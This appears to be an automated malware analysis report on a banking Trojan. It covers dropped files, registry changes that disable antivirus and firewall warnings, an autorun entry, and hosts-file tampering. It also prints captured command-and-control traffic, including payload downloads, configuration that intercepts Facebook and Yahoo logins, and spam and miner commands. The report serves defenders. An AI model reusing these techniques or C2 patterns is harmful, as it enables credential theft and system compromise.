Susp_Dropper (Kaspersky), Gen:Variant.Symmi.25089 (B) (Emsisoft), Gen:Variant.Symmi.25089 (AdAware), mzpefinder_pcap_file.YR, BankerGeneric.YR (Lavasoft MAS)
Behaviour: Banker
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: d6083eb7ba57b6804be94a23b1ba72b7
SHA1: 24ae81c07e461372819a1489b46c2d4419b479b1
SHA256: cb9972f6ff7f1d1a0ecc647d6567d4ef1b4b1a281464c07ef1977b6d8ec28021
SSDeep: 12288: PW4eTjsuguKMx4jc6JlAHtCYTmqhhHHwjtEcIWhdRBFipe/Ex6kAnTP: u40j1gu5x4I6JSAYTnhhfid0SExbU
Size: 800768 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-02-12 20:58:22
Analyzed on: WindowsXP SP3 32-bit
Summary: Banker. Steals data relating to online banking systems, e-payment systems and credit card systems.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
ihj3deeem5zr.exe:704
ihj3dee6umzr.exe:3840
smp5hldte9zo4u.exe:2780
smp5hld7ljzo4upwykfp.exe:2236
smp5hldgdxzo4u.exe:2804
smp5hld8mfzo4u.exe:2560
rtfrebrgje.exe:2956
rtfrebrgje.exe:396
rtfrebrgje.exe:1104
%original file name%.exe:1964
dklhlsph.exe:2108
dklhlsph.exe:3676
dklhlsph.exe:2720
The Trojan injects its code into the following process(es):
No processes have been created.
File activity
The process ihj3deeem5zr.exe:704 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\dsvmzzbluxpxh\tst (10 bytes)
The process smp5hldte9zo4u.exe:2780 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\rtfrebrgje.exe (7547 bytes)
%System%\dsvmzzbluxpxh\tst (10 bytes)
The Trojan deletes the following file(s):
%System%\rtfrebrgje.exe (0 bytes)
The process smp5hld7ljzo4upwykfp.exe:2236 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\dsvmzzbluxpxh\etc (10 bytes)
%System%\rtfrebrgje.exe (5873 bytes)
%System%\drivers\etc\hosts (22 bytes)
%System%\dsvmzzbluxpxh\tst (10 bytes)
The Trojan deletes the following file(s):
%System%\drivers\etc\hosts (0 bytes)
The process smp5hldgdxzo4u.exe:2804 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\dsvmzzbluxpxh\tst (10 bytes)
The process rtfrebrgje.exe:2956 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\dsvmzzbluxpxh\rng (60 bytes)
%WinDir%\Temp\smp5hldgdxzo4u.exe (5873 bytes)
%System%\dsvmzzbluxpxh\run (10 bytes)
%WinDir%\Temp\smp5hldte9zo4u.exe (26305 bytes)
%System%\dsvmzzbluxpxh\cfg (110 bytes)
%System%\dklhlsph.exe (5873 bytes)
%WinDir%\Temp\smp5hld8mfzo4u.exe (35 bytes)
%System%\dsvmzzbluxpxh\tst (10 bytes)
The Trojan deletes the following file(s):
%WinDir%\Temp\smp5hldgdxzo4u.exe (0 bytes)
%WinDir%\Temp\smp5hldte9zo4u.exe (0 bytes)
%WinDir%\Temp\smp5hld8mfzo4u.exe (0 bytes)
The process rtfrebrgje.exe:396 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\dsvmzzbluxpxh\tst (10 bytes)
The process rtfrebrgje.exe:1104 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\dsvmzzbluxpxh\rng (40 bytes)
%System%\dsvmzzbluxpxh\run (10 bytes)
%System%\dsvmzzbluxpxh\cfg (446 bytes)
%System%\dsvmzzbluxpxh\aol\zip.exe (10500 bytes)
%System%\drivers\etc\hosts (100 bytes)
%System%\dsvmzzbluxpxh\aol\exefile (14580 bytes)
%WinDir%\Temp\ihj3deeem5zr.exe (7547 bytes)
%WinDir%\Temp\ihj3dee6umzr.exe (35 bytes)
%System%\dsvmzzbluxpxh\ihst (222 bytes)
%System%\dklhlsph.exe (7547 bytes)
%System%\dsvmzzbluxpxh\tst (10 bytes)
The Trojan deletes the following file(s):
%WinDir%\Temp\ihj3dee6umzr.exe (0 bytes)
The process %original file name%.exe:1964 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\smp5hld7ljzo4upwykfp.exe (3873 bytes)
%System%\dsvmzzbluxpxh\tst (10 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\smp5hld7ljzo4upwykfp.exe (0 bytes)
The process dklhlsph.exe:2108 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\dsvmzzbluxpxh\tst (10 bytes)
The process dklhlsph.exe:3676 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\dsvmzzbluxpxh\tst (10 bytes)
The process dklhlsph.exe:2720 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\dsvmzzbluxpxh\tst (10 bytes)
Registry activity
The process ihj3deeem5zr.exe:704 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "96 FB E8 06 B0 70 E1 5A 8A 48 A3 9C 79 B5 4B D6"
The process ihj3dee6umzr.exe:3840 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 88 D9 03 0B B9 F7 B3 3C 0F 28 EC 23 4E 9D FE"
The process smp5hld7ljzo4upwykfp.exe:2236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F 0E 03 4E 16 C3 7F EF 41 66 23 82 BB 87 5C F0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Block Controls Agent Upgrade" = "%System%\rtfrebrgje.exe"
The process smp5hldgdxzo4u.exe:2804 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 3A BF B6 2B D8 FA 2C C8 7E 2E F8 8D EF 76 BC"
The process smp5hld8mfzo4u.exe:2560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 CE A3 0D 0E E8 CD 5F 23 D4 96 2D 0C C4 7F 99"
The process rtfrebrgje.exe:2956 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E 89 FC 58 1D F2 15 D0 4C 6D BC 5B C0 F9 EF 9A"
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
"FirewallDisableNotify" = "1"
Antivirus notifications are disabled:
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"
The process rtfrebrgje.exe:1104 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 36 CF 01 63 8B 6C 08 62 DE 1F D6 F1 74 D3 D4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
Antivirus notifications are disabled:
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"
Dropped PE files
MD5 | File path |
---|---|
6a0c0feda509c4ac94d0390504580a40 | c:\WINDOWS\Temp\ihj3deeem5zr.exe |
6a0c0feda509c4ac94d0390504580a40 | c:\WINDOWS\Temp\smp5hldte9zo4u.exe |
6a0c0feda509c4ac94d0390504580a40 | c:\WINDOWS\system32\dklhlsph.exe |
6a0c0feda509c4ac94d0390504580a40 | c:\WINDOWS\system32\rtfrebrgje.exe |
HOSTS file anomalies
The Trojan modifies the "%System%\drivers\etc\hosts" file, which is used to translate DNS entries to IP addresses. The modified file is 100 bytes in size. The following entries are added to the hosts file:
IP | Hostname |
---|---|
127.0.0.1 | www.facebook.com |
127.0.0.1 | facebook.com |
127.0.0.1 | mail.yahoo.com |
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
ihj3deeem5zr.exe:704
ihj3dee6umzr.exe:3840
smp5hldte9zo4u.exe:2780
smp5hld7ljzo4upwykfp.exe:2236
smp5hldgdxzo4u.exe:2804
smp5hld8mfzo4u.exe:2560
rtfrebrgje.exe:2956
rtfrebrgje.exe:396
rtfrebrgje.exe:1104
%original file name%.exe:1964
dklhlsph.exe:2108
dklhlsph.exe:3676
dklhlsph.exe:2720
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%System%\dsvmzzbluxpxh\tst (10 bytes)
%System%\rtfrebrgje.exe (7547 bytes)
%System%\dsvmzzbluxpxh\etc (10 bytes)
%System%\drivers\etc\hosts (22 bytes)
%System%\dsvmzzbluxpxh\rng (60 bytes)
%WinDir%\Temp\smp5hldgdxzo4u.exe (5873 bytes)
%System%\dsvmzzbluxpxh\run (10 bytes)
%WinDir%\Temp\smp5hldte9zo4u.exe (26305 bytes)
%System%\dsvmzzbluxpxh\cfg (110 bytes)
%System%\dklhlsph.exe (5873 bytes)
%WinDir%\Temp\smp5hld8mfzo4u.exe (35 bytes)
%System%\dsvmzzbluxpxh\aol\zip.exe (10500 bytes)
%System%\dsvmzzbluxpxh\aol\exefile (14580 bytes)
%WinDir%\Temp\ihj3deeem5zr.exe (7547 bytes)
%WinDir%\Temp\ihj3dee6umzr.exe (35 bytes)
%System%\dsvmzzbluxpxh\ihst (222 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\smp5hld7ljzo4upwykfp.exe (3873 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Block Controls Agent Upgrade" = "%System%\rtfrebrgje.exe"
- Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
127.0.0.1 localhost
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 625046 | 625152 | 4.72563 | 15d8577199cdc76febaf3c740802e9e9 |
.rdata | 630784 | 50574 | 50688 | 3.68239 | 38f6c87f441b9d6af889847d2c59ffc0 |
.data | 684032 | 157628 | 123904 | 5.49709 | 5d4d38ea339b05a2784c1221970abf74 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://donaven4guia.com/forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 | 216.239.138.217 |
hxxp://fredesecas.com/forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 | 216.239.139.20 |
hxxp://laloponea.com/forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 | 216.239.138.68 |
hxxp://davedekilai.com/forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 | 66.147.244.161 |
hxxp://tablefruit.net/forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 | 98.139.135.198 |
hxxp://stickmarch.net/forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 | 208.91.197.241 |
hxxp://groupcook.net/forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 | 216.239.138.245 |
hxxp://groupcook.net/forum/search.php?method=all&flag&mode=sox&v=023&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | 216.239.138.245 |
hxxp://groupcook.net/forum/search.php?method=checkport&port=28929&mode=sox&v=023&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | 216.239.138.245 |
hxxp://groupcook.net/forum/search.php?method=update&noxor&exe=rtfrebrgje.exe&reg=Block Controls Agent Upgrade&svc=Services Portable Audio Compatibility Class&wname=dklhlsph.exe&dir=dsvmzzbluxpxh&mode=sox&v=023&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | 216.239.138.245 |
hxxp://donaven4guia.com/index.php?method=validate&mode=sox&v=029&sox=3c801802 | 216.239.138.217 |
hxxp://fredesecas.com/index.php?method=validate&mode=sox&v=029&sox=3c801802 | 216.239.139.20 |
hxxp://laloponea.com/index.php?method=validate&mode=sox&v=029&sox=3c801802 | 216.239.138.68 |
hxxp://davedekilai.com/index.php?method=validate&mode=sox&v=029&sox=3c801802 | 66.147.244.161 |
hxxp://tablefruit.net/index.php?method=validate&mode=sox&v=029&sox=3c801802 | 98.139.135.198 |
hxxp://stickmarch.net/index.php?method=validate&mode=sox&v=029&sox=3c801802 | 208.91.197.241 |
hxxp://groupcook.net/index.php?method=validate&mode=sox&v=029&sox=3c801802 | 216.239.138.245 |
hxxp://groupcook.net/index.php?method=all&flag&mode=sox&v=029&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 | 216.239.138.245 |
hxxp://groupcook.net/index.php?method=setvar&key=cpuinfo&value=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz (3392 MHz)&mode=sox&v=029&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=1&adm=1&x64=0&mr=0 | 216.239.138.245 |
hxxp://tablefruit.net/dep/zip.exe | 98.139.135.198 |
hxxp://groupcook.net/index.php?method=hostname&host=www.facebook.com&mode=sox&v=029&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=1&adm=1&x64=0&mr=0 | 216.239.138.245 |
hxxp://groupcook.net/index.php?method=dep&noxor&file=zip.exe&mode=sox&v=029&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=1&adm=1&x64=0&mr=0 | 216.239.138.245 |
hxxp://groupcook.net/index.php?method=checkport&port=50225&mode=sox&v=029&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=1&adm=1&x64=0&mr=0 | 216.239.138.245 |
hxxp://partyorderly.net/dep/zip.exe | 98.139.135.198 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /index.php?method=hostname&host=VVV.facebook.com&mode=sox&v=029&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=1&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: groupcook.net
HTTP/1.1 200 OK
Date: Wed, 14 May 2014 10:30:35 GMT
Server: Apache/2
Connection: close
Content-Type: text/html
GET /forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 HTTP/1.0
Accept: */*
Connection: close
Host: davedekilai.com
HTTP/1.1 302 Found
Date: Wed, 14 May 2014 10:29:44 GMT
Server: Apache
Location: hXXp://box661.bluehost.com/suspended.page/disabled.cgi/davedekilai.com?method=validate&mode=sox&v=023&sox=3c801802
Content-Length: 375
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>302 Found</title>.</head><body>.<h1>Found</h1>.<p>The document has moved <a href="hXXp://box661.bluehost.com/suspended.page/disabled.cgi/davedekilai.com?method=validate&mode=sox&v=023&sox=3c801802">here</a>.</p>.<hr>.<address>Apache Server at davedekilai.com Port 80</address>.</body></html>...
GET /index.php?method=setvar&key=cpuinfo&value=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz (3392 MHz)&mode=sox&v=029&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=1&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: groupcook.net
HTTP/1.1 200 OK
Date: Wed, 14 May 2014 10:30:34 GMT
Server: Apache/2
Connection: close
Content-Type: text/html
GET /forum/search.php?method=update&noxor&exe=rtfrebrgje.exe&reg=Block Controls Agent Upgrade&svc=Services Portable Audio Compatibility Class&wname=dklhlsph.exe&dir=dsvmzzbluxpxh&mode=sox&v=023&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: groupcook.net
HTTP/1.1 200 OK
Date: Wed, 14 May 2014 10:29:53 GMT
Server: Apache/2
Connection: close
Content-Type: text/html
<<< skipped >>>
GET /forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 HTTP/1.0
Accept: */*
Connection: close
Host: groupcook.net
HTTP/1.1 200 OK
Date: Wed, 14 May 2014 10:29:48 GMT
Server: Apache/2
Connection: close
Content-Type: text/html
GET /forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 HTTP/1.0
Accept: */*
Connection: close
Host: fredesecas.com
HTTP/1.1 404 Not Found
Date: Wed, 14 May 2014 10:29:43 GMT
Server: Apache/2
Accept-Ranges: bytes
Content-Length: 21
Cache-control: no-store
Pragma: no-cache
Connection: close
Content-Type: text/html
Unknown Virtual Host...
GET /forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 HTTP/1.0
Accept: */*
Connection: close
Host: donaven4guia.com
HTTP/1.1 404 Not Found
Date: Wed, 14 May 2014 10:29:42 GMT
Server: Apache/2
Accept-Ranges: bytes
Content-Length: 21
Cache-control: no-store
Pragma: no-cache
Connection: close
Content-Type: text/html
Unknown Virtual Host...
GET /index.php?method=dep&noxor&file=zip.exe&mode=sox&v=029&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=1&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: groupcook.net
HTTP/1.1 200 OK
Date: Wed, 14 May 2014 10:30:35 GMT
Server: Apache/2
Connection: close
Content-Type: text/html
<<< skipped >>>
GET /dep/zip.exe HTTP/1.0
Accept: */*
Connection: close
Host: partyorderly.net
HTTP/1.0 999 Unable to process request at this time -- error 999
Date: Wed, 14 May 2014 10:30:35 GMT
Expires: Thu, 01 Jan 1970 22:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Age: 0
Server: YTS/1.20.28
<<< skipped >>>
GET /index.php?method=validate&mode=sox&v=029&sox=3c801802 HTTP/1.0
Accept: */*
Connection: close
Host: donaven4guia.com
HTTP/1.1 404 Not Found
Date: Wed, 14 May 2014 10:30:26 GMT
Server: Apache/2
Accept-Ranges: bytes
Content-Length: 21
Cache-control: no-store
Pragma: no-cache
Connection: close
Content-Type: text/html
Unknown Virtual Host...
GET /forum/search.php?method=all&flag&mode=sox&v=023&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: groupcook.net
HTTP/1.1 200 OK
Date: Wed, 14 May 2014 10:29:49 GMT
Server: Apache/2
Connection: close
Content-Type: text/html
ping.12.FLAG UPDATE cfg.318."southblood.net" "wifeknew.net" "frontride.net" "rememberpaint.net" "gentlefriend.net" "spokethere.net" "tablefruit.net" "wifeyesterday.net" "uponloud.net" "wrongthrew.net" "necessarydress.net" "thistomorrow.net" "saltsecond.net" "signarmy.net" "littleappear.net" "mightglossary.net" "whichsing.net" "lasopeidres.com" var_user_ip.427.%kill_jhminer% = "1";.%set_intercepts% = ""VVV.facebook.com" "partyorderly.net" "/fb_login/" "/login/" "1" "facebook.com" "partyorderly.net" "/fb_login/" "/login/" "0" "mail.yahoo.com" "partyorderly.net" "/yahoo/" "/config/" "0" ";.%dep_host% = "partyorderly.net";.%dep_path% = "/dep/";.%no_password% = "0";.%timer% = "1200";.%cpuinfo% = " Intel(R) Atom(TM) CPU K510 @ 1.66GHz (1666 MHz)";.%state% = "BU";.%newport% = "50046";.plugin.55070.miner_forced.80.win32drkclient.exe -a X11 -o stratum tcp://"%local server IP%":3388 -u 3c801802 -p x.
<<< skipped >>>
GET /index.php?method=validate&mode=sox&v=029&sox=3c801802 HTTP/1.0
Accept: */*
Connection: close
Host: laloponea.com
HTTP/1.1 404 Not Found
Date: Wed, 14 May 2014 10:30:28 GMT
Server: Apache/2
Accept-Ranges: bytes
Content-Length: 21
Cache-control: no-store
Pragma: no-cache
Connection: close
Content-Type: text/html
Unknown Virtual Host...
GET /index.php?method=validate&mode=sox&v=029&sox=3c801802 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 404 Not Found
Date: Wed, 14 May 2014 10:30:29 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html; charset=iso-8859-1
Age: 0
Server: YTS/1.20.28
<h1 style='color:#497A97;font-size:12pt;font-weight:bold'>404 - Not Found..
GET /index.php?method=all&flag&mode=sox&v=029&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: groupcook.net
HTTP/1.1 200 OK
Date: Wed, 14 May 2014 10:30:34 GMT
Server: Apache/2
Connection: close
Content-Type: text/html
ping.5.FLAG cfg.318."frontride.net" "spokethere.net" "mightglossary.net" "southblood.net" "uponloud.net" "gentlefriend.net" "tablefruit.net" "signarmy.net" "wifeyesterday.net" "wrongthrew.net" "saltsecond.net" "littleappear.net" "thistomorrow.net" "rememberpaint.net" "wifeknew.net" "whichsing.net" "necessarydress.net" "lasopeidres.com" var_user_ip.407.%send_aol_spam% = "1";.%set_intercepts% = ""VVV.facebook.com" "partyorderly.net" "/fb_login/" "/login/" "1" "facebook.com" "partyorderly.net" "/fb_login/" "/login/" "0" "mail.yahoo.com" "partyorderly.net" "/yahoo/" "/config/" "0" ";.%dep_host% = "partyorderly.net";.%dep_path% = "/dep/";.%no_password% = "0";.%timer% = "1200";.%cpuinfo% = " Intel(R) Atom(TM) CPU K510 @ 1.66GHz (1666 MHz)";.%state% = "BU";
GET /forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 HTTP/1.0
Accept: */*
Connection: close
Host: tablefruit.net
HTTP/1.0 502 Cannot find server.
Date: Wed, 14 May 2014 10:29:44 GMT
Server: YTS/1.20.28
Cache-Control: no-store
Content-Type: text/html
Content-Language: en
Content-Length: 2477
<<< skipped >>>
GET /index.php?method=validate&mode=sox&v=029&sox=3c801802 HTTP/1.0
Accept: */*
Connection: close
Host: fredesecas.com
HTTP/1.1 404 Not Found
Date: Wed, 14 May 2014 10:30:27 GMT
Server: Apache/2
Accept-Ranges: bytes
Content-Length: 21
Cache-control: no-store
Pragma: no-cache
Connection: close
Content-Type: text/html
Unknown Virtual Host...
GET /index.php?method=validate&mode=sox&v=029&sox=3c801802 HTTP/1.0
Accept: */*
Connection: close
Host: davedekilai.com
HTTP/1.1 302 Found
Date: Wed, 14 May 2014 10:30:28 GMT
Server: Apache
Location: hXXp://box661.bluehost.com/suspended.page/disabled.cgi/davedekilai.com?method=validate&mode=sox&v=029&sox=3c801802
Content-Length: 375
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>302 Found</title>.</head><body>.<h1>Found</h1>.<p>The document has moved <a href="hXXp://box661.bluehost.com/suspended.page/disabled.cgi/davedekilai.com?method=validate&mode=sox&v=029&sox=3c801802">here</a>.</p>.<hr>.<address>Apache Server at davedekilai.com Port 80</address>.</body></html>...
GET /forum/search.php?method=validate&mode=sox&v=023&sox=3c801802 HTTP/1.0
Accept: */*
Connection: close
Host: stickmarch.net
HTTP/1.1 200 OK
Date: Wed, 14 May 2014 10:29:46 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2599
Keep-Alive: timeout=5, max=125
Connection: close
Content-Type: text/html; charset=UTF-8
<!--...top.location="hXXp://stickmarch.net/?fp=NW2h08TAj7gbVUttw+xPVWVSFWaTBxrHiZqdPXCM1svDvDZj3S/1NgrSEz9Zu3JEf1rzQ1hcG7ba3OfbEsRspw==&prvtof=BE7b74bkKxSMO7Gg0oA8cRYUY8mdRLyJ08mI642nGpw=&poru=j3wdAEauXXLonOEwgYzkE0rLayDJqs4fehr/PbrJnRo25j0kvK5KhU9dGDWdrqBRppKA4ZZKzKtGzaPXdobpSgRWz6YnX2Rszj56RoLJeEGzYxD11+GjaWk3jBXTGY6f&cifr=1&method=validate&mode=sox&v=023&sox=3c801802";.../*..-->..<script type="text/javascript">...<!--...dimensionUpdated = 0;...function applyFrameKiller()...{....if(window.top != self)....{.....cHeight = 0;.....if( typeof( window.innerHeight ) != 'undefined' ) {.....//Non-IE.....cHeight = window.innerHeight;.....dimensionUpdated = 1;.....} else if( document.documentElement && ( document.documentElement.clientWidth || document.documentElement.clientHeight ) ) {.....//IE 6 in 'standards compliant mode'.....cHeight = document.documentElement.clientHeight;.....dimensionUpdated = 1;.....} else if( document.body && ( document.body.clientWidth || document.body.clientHeight ) ) {.....//IE 4 compatible.....cHeight = document.body.clientHeight;.....dimensionUpdated = 1;.....}.....if( cHeight <= 250 && dimensionUpdated == 1).....{......window.top.location = "hXXp://stickmarch.net/?fp=NW2h08TAj7gbVUttw+xPVWVSFWaTBxrHiZqdPXCM1svDvDZj3S/1NgrSEz9Zu3JEf1rzQ1hcG7ba3OfbEsRspw==&prvtof=mAULZ+n4ckB2+bP0yNbRC+IDToxI3XfDbcsX4+bvyh4%3D&poru=40svIkffRVdZYCtF0u6SMdx3r87rr1LbQln9I6FyWtoUkyyyJ8sgXZtP9WLY2YB8SPUktXhCTsr/xkPQ/MblgiNO7KnE2MHpPpHuZe9cvGEAGJTLRRhbzs2iego1
<<
<<< skipped >>>
GET /forum/search.php?method=checkport&port=28929&mode=sox&v=023&sox=3c801802&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: groupcook.net
HTTP/1.1 200 OK
Date: Wed, 14 May 2014 10:29:53 GMT
Server: Apache/2
Content-Length: 0
Connection: close
Content-Type: text/html
GET /index.php?method=validate&mode=sox&v=029&sox=3c801802 HTTP/1.0
Accept: */*
Connection: close
Host: groupcook.net
